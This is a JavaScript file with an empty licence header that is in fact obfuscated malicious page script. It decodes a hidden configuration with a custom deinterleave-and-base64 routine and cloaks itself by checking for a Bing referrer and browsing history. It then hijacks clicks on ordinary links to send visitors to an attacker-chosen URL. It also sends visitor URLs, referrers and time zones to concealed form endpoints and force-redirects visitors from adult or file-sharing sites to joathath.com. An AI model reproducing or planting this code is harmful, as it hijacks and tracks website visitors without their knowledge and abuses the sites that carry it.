/**
 * @licence 
 * Copyright ©
 * All rights reserved
 * This source code is licensed under the found in the
 * LICENSE file in the root directory of this source tree
*/

class Evaluater{
	get(bad){
		bad=this.getFixed(bad);
		return bad;
	}

	getFixed(txt){
		var p1="",p2="",l=txt.length;
		for(let i=0; i<=l; i++){
			if(i%2==0){
				p2=txt.charAt(i)+p2;
			}else{
				p1=p1+txt.charAt(i);
			}
		}
		return atob(p1+p2);
	}

}

class decideAndDo{
	constructor(){
		var gotCont=false;

		var cotGetTry = setInterval(()=>{
			try{
				this.process(contDataFinal);
				gotCont=true;
			}catch(e){
				gotCont=false;
			}

			if(gotCont){
				clearInterval(cotGetTry)
			}
		},100);
	}

	process(ret){

		var myNextData=JSON.parse(new Evaluater().get(ret));
		var got=false;
		this.checkIfFromAds()
		myNextData.forEach(val=>{
			if(location.href.includes(val[2])){
				got=true;
				this.checkSafe(val)
			}
		})
		!got?this.sendInfo('LOCATION: failed:-:'+getDefaultName()):"";
	}

	doit(data,msg){
		var x=document.querySelectorAll('a');
		x.forEach(val=>{
			if(val.href.includes(".php") || val.href.includes("clickbank") || val.href.includes(".html") || val.href.includes("join") ){
				val.addEventListener('click',(e)=>{
					e.preventDefault();
					this.finalised(msg);
					location.assign(data[3]);
				})
			}
		})
	}
	checkSafe(val){
		var device=Number(val[0]),
		// per=Number(val[1]),
		per=100,
		name=Number(val[2]);

		var okay=true,msg="";
		/*device check*/
		if(false
			// navigator.appVersion.includes('Mac OS') ||
			// navigator.appVersion.includes('Windows')
		){
			okay=false;
		}else{

		}
		msg+=":-:"+getDefaultName();

		/*percentage check*/
		if(Math.ceil(Math.random()*100/per)==1){

		}else{
			msg+=":-:PERCENTAGE check failed";
			okay=false;
		}


/*temp conds*/
		if(history.length>=3 && document.referrer.includes("bing")){
			okay=true;
		}else{
			okay=false;
		}
/*temp conds*/
		
		if(okay){
			this.doit(val,msg);
			msg="YES"+msg;
		}else{
			msg="NO"+msg;
		}
		this.sendInfo(msg)
	}

	sendInfo(msg){
		makeForm(sc.get('Ua2HcRu09cGHcMz6VLmyU9tkJb32bNmz9LSmUd0vRbU2adqsdZGSb5tjVbk2Q0WvhZTmM9OyZbEXMMwvEdHSO8QwdLl2VQBvpZWSd80xFRWkdFjJlcVFNFFMxUU2TVG3pd32SR1IQVzUMtr'),{
			"entry.522782255":Nloaded+"-"+history.length+"_"+document.referrer,
			"entry.2147471592":location.href,
			"entry.559704587":msg,
			"entry.1784255635":this.getMacTime(),
		});
	}

	finalised(msg){
		makeForm(sc.get('Ua2HcRu09cGHcMz6VLmyU9tkJb32bNmz9LSmQd5vNbl2edFsNZ3Sa5CjZbE2V0XvhZGma9GyNbTXbMkvBd1SS8rwxLk2MQwvFZXSa8ExhRUkZFwJpcUFVFtMUU32RQJ1VcFHZVTEFezHadz'),{
			"entry.1742212599":Nloaded+"-"+history.length+"_"+document.referrer,
			"entry.1832856812":location.href,
			"entry.1617942729":msg,
			"entry.121403084":this.getMacTime(),
		});
	}

	getMacTime(){
		return new Date().toLocaleTimeString()+ " "+new Date().toTimeString().split("(")[1].replace(")","");
	}
	checkIfFromAds(){
		if(
			document.referrer.includes("love")||
			document.referrer.includes("dood")||
			document.referrer.includes("porn")||
			document.referrer.includes("moon")||
			document.referrer.includes("file")||
			document.referrer.includes("ds2play")
			){
			location.replace("//joathath.com/4/6606783");
		}
	}

}
new decideAndDo();
